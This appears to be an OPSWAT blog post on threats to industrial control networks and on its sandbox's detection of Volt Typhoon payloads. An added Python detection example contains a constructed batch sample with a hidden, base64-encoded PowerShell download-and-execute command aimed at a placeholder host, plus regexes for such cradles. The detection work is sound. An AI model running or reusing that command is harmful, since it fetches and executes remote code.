
Navigating the Cybersecurity Landscape of ICS and OT Networks: Insights and Solutions

by OPSWAT

Introduction

In the ever-evolving world of cybersecurity, Industrial Control Systems (ICS) and Operational Technology (OT) networks represent a significant area of concern. These systems are not only vital to the continuity of business operations but are also integral components of a nation's critical infrastructure. OPSWAT's MetaDefender Sandbox (previously known as Filescan Sandbox) team has been diligently monitoring ICS/OT risks and has observed persistent and potentially high-impact activities.

The Current Threat Landscape

Recent patterns in cybersecurity threats show a worrying trend: state-sponsored groups such as Sandworm (Russia) and Volt Typhoon (China) have started to specialize in ICS, while cybercriminals are well aware of how severe the impact of an attack on industrial systems can be. Security forces across the board recognize the importance of these threats to all industry sectors, leading to the release of joint reports and campaigns aimed at bolstering ICS security.

Persistent Issues and Recommendations

One of the longstanding recommendations to mitigate these risks is to reduce system exposure. However, the prevalence of exposed systems continues to be a troubling issue within the cybersecurity landscape. As techniques for reconnaissance and exploitation become more widely disseminated, the threat of opportunistic attacks looms larger, allowing threat actors with lower levels of sophistication to have an impact against critical systems. A report from September highlighted an alarming trend: OT/ICS cybersecurity incidents in the last three years have surpassed the total reported from 1991 to 2000. This statistic alone underscores the escalating challenges faced by those responsible for the security of these environments.

Defending against the threat

Frameworks and Updates

Recognizing the need for specialized attention, the MITRE Corporation developed an ICS-specific ATT&CK matrix to provide a common language for inter-sector communication and to empower underrepresented sectors to leverage its mappings, fostering meaningful communication about risks and threats. The relatively new matrix continues to be meticulously updated, with the latest version released just last month.

The Interconnectedness of IT and OT

The OPSWAT MetaDefender Sandbox team, while keeping abreast of these updates, emphasizes the intrinsic connection between IT and OT, since IT assets are present across all the levels of the Purdue Model, and not only at the top.


Compromised IT Leads to Compromised OT. Respondents are predominantly concerned with and have experienced ICS incidents involving malware threats or attackers breaching the IT business network. These breaches often enable access and pivoting into the ICS/OT environment. Compromises in IT systems leading to threats entering OT/ICS networks ranked highest, followed by compromises of engineering workstations and external remote services.

The SANS 2023 ICS/OT Cybersecurity Report
sponsored by OPSWAT

The Common Denominator: Malicious Files

Across the spectrum of ICS-related cyberattacks, the presence of malicious files is a consistent factor, regardless of the vector of entry—be it IT or OT systems. This is where solutions like the MetaDefender Sandbox come into play. Such tools are designed to scrutinize files traversing the defined perimeters of an organization's network, tailored to different contexts for optimal performance, including within air-gapped environments.

OPSWAT's Adaptive Sandbox combines different sets of threat indicators, using in-house analyzers alongside widely known ones such as YARA rules. Both attacks referenced above, from Volt Typhoon and Sandworm, heavily relied on Living-Off-the-Land binaries (LOLBins), for which MetaDefender Sandbox implements many indicators. The earliest of these attacks offers a good example of how indicators combine, because samples are publicly available. The first reported payload is a batch script containing a base64-encoded PowerShell command, which triggers two indicators of interest for this case, among others.

Figure 1 Analysis of Volt Typhoon's payload

The indicator shown above originates from script emulation, where other relevant indicators can also be observed. The following screenshot shows a different, higher-severity indicator, triggered by the decoded base64 content of the script. Both identified elements are mapped to the corresponding MITRE ATT&CK techniques.
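To make the two-stage matching described above concrete, here is an added example in Python (not OPSWAT's or MetaDefender Sandbox's code): stage one runs indicators over the raw batch script, stage two decodes the base64 blob the way `-EncodedCommand` expects it (UTF-16LE) and runs higher-severity indicators over the decoded content, with each hit carrying its MITRE ATT&CK technique ID. The indicator names, severities and the sample batch script are constructed for illustration and are not the real payload.

```python
import base64
import re
from typing import NamedTuple, Optional


class Indicator(NamedTuple):
    name: str
    severity: str      # constructed scale: low / medium / high
    attack_id: str     # MITRE ATT&CK technique the indicator maps to
    pattern: re.Pattern


# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts all three).
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Stage 1: indicators matched against the raw batch script (LOLBin launch, obfuscation).
SCRIPT_INDICATORS = [
    Indicator("powershell_lolbin", "medium", "T1059.001", re.compile(r"powershell(\.exe)?", re.I)),
    Indicator("hidden_window", "medium", "T1564.003", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    Indicator("encoded_command", "medium", "T1027", ENC_RE),
]
# Stage 2: higher-severity indicators only visible after decoding the payload.
DECODED_INDICATORS = [
    Indicator("download_cradle", "high", "T1105", re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b", re.I)),
    Indicator("invoke_expression", "high", "T1059.001", re.compile(r"\biex\b|Invoke-Expression", re.I)),
]


def extract_encoded_command(script: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    m = ENC_RE.search(script)
    if not m:
        return None
    try:
        # -EncodedCommand is base64 over UTF-16LE text, not UTF-8; an odd byte count fails.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _hit(ind: Indicator, source: str) -> dict:
    return {"indicator": ind.name, "severity": ind.severity, "attack": ind.attack_id, "source": source}


def analyze(script: str) -> list:
    """Run both stages and return one hit per matched indicator."""
    hits = [_hit(i, "script") for i in SCRIPT_INDICATORS if i.pattern.search(script)]
    decoded = extract_encoded_command(script)
    if decoded is not None:
        hits += [_hit(i, "decoded") for i in DECODED_INDICATORS if i.pattern.search(decoded)]
    return hits


# Constructed sample in the shape the post describes: a batch file launching PowerShell
# with a base64-encoded download-and-run command (TEST-NET address, not a real host).
DECODED_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
SAMPLE_BAT = ("@echo off\r\npowershell.exe -nop -w hidden -EncodedCommand "
              + base64.b64encode(DECODED_SAMPLE.encode("utf-16-le")).decode("ascii") + "\r\n")

if __name__ == "__main__":
    for h in analyze(SAMPLE_BAT):
        print(f"[{h['severity']:>6}] {h['indicator']:<18} {h['attack']:<10} from {h['source']}")
```

Running the script on the constructed sample yields three medium hits from the raw script and two high hits from the decoded content, which is the severity jump the screenshots above illustrate.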

Figure 2 Analysis of Volt Typhoon's payload

This same attack also involved Fast Reverse Proxy (FRP) samples which, despite being UPX-packed, MetaDefender Sandbox was able to unpack, allowing several additional indicators to match on the extracted file and identify the threat.

Figure 3 Volt Typhoon's unpacked FRP sample

Figure 4 YARA identifying the unpacked sample as FRP

Conclusion

As the threat landscape evolves, so must our defenses. OPSWAT's commitment to the security of ICS and OT networks remains steadfast, and the MetaDefender Sandbox team is dedicated to providing actively updated solutions that address these emerging challenges. Stay informed, stay prepared, and stay secure.
